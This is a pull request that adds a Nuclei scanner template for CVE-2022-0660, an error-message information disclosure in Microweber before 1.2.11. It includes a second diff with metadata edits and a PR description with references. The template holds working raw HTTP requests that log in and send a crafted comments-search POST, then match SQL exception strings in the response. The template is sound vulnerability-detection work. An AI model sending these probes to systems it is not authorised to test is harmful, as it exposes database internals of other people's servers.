### PR TITLE
Create  CVE-2022-0660

### DIFF
--- a/cves/2022/CVE-2022-0660.yaml
+++ b/cves/2022/CVE-2022-0660.yaml
@@ -1,0 +1,45 @@
+id: CVE-2022-0660
+
+info:
+  name: Microweber - Information Disclosure
+  author: ami-jd
+  severity: high
+  description: Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0660
+    - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/
+    - https://github.com/advisories/GHSA-hhrj-wp42-32v3
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-209
+  tags: cve,cve2022,microweber,disclosure
+
+requests:
+  - raw:
+      - |
+        POST /api/user_login HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username={{username}}&password={{password}}
+        
+      - |
+        POST /module/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Referer: {{BaseURL}}admin/view:comments
+
+        class=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}
+
+    req-condition: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_2,'QueryException')
+          - contains(body_2,'SQLSTATE')
+          - contains(body_2,'runQueryCallback')
+          - 'contains(all_headers_2,"text/html")'
+          - 'status_code_2==500'
+        condition: and

--- a/cves/2022/CVE-2022-0660.yaml
+++ b/cves/2022/CVE-2022-0660.yaml
@@ -1,19 +1,22 @@
 id: CVE-2022-0660
 
 info:
-  name: Microweber - Information Disclosure
+  name: Microweber < 1.2.11 - Information Disclosure
   author: ami-jd
   severity: high
-  description: Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11.
+  description: |
+    Generation of error message containing sensitive information while viewing comments from "load_module:comments#search="in Packagist microweber/microweber prior to 1.2.11.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-0660
     - https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/
     - https://github.com/advisories/GHSA-hhrj-wp42-32v3
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0660
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cwe-id: CWE-209
-  tags: cve,cve2022,microweber,disclosure
+  metadata:
+    verified: true
+  tags: cve,cve2022,microweber,disclosure,authenticated
 
 requests:
   - raw:
@@ -23,7 +26,7 @@ requests:
         Content-Type: application/x-www-form-urlencoded
 
         username={{username}}&password={{password}}
-        
+
       - |
         POST /module/ HTTP/1.1
         Host: {{Hostname}}


### PR DESCRIPTION
### Template / PR Information

**Generation of Error Message Containing Sensitive Information in Microweber** _(<1.2.11)_

Sensitive information as part of the error is getting disclosed while viewing comments from "load_module:comments#search="
<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2022-0660
- References:
  > [GHSA](https://github.com/advisories/GHSA-hhrj-wp42-32v3)
  > [Huntr.dev](https://huntr.dev/bounties/01fd2e0d-b8cf-487f-a16c-7b088ef3a291/)

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)
![image](https://user-images.githubusercontent.com/78851976/182591753-31886851-5278-44c5-9fb9-89e613ea57aa.png)
![image](https://user-images.githubusercontent.com/78851976/182592350-36329ed3-80be-4b13-b326-97572d0b6c25.png)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)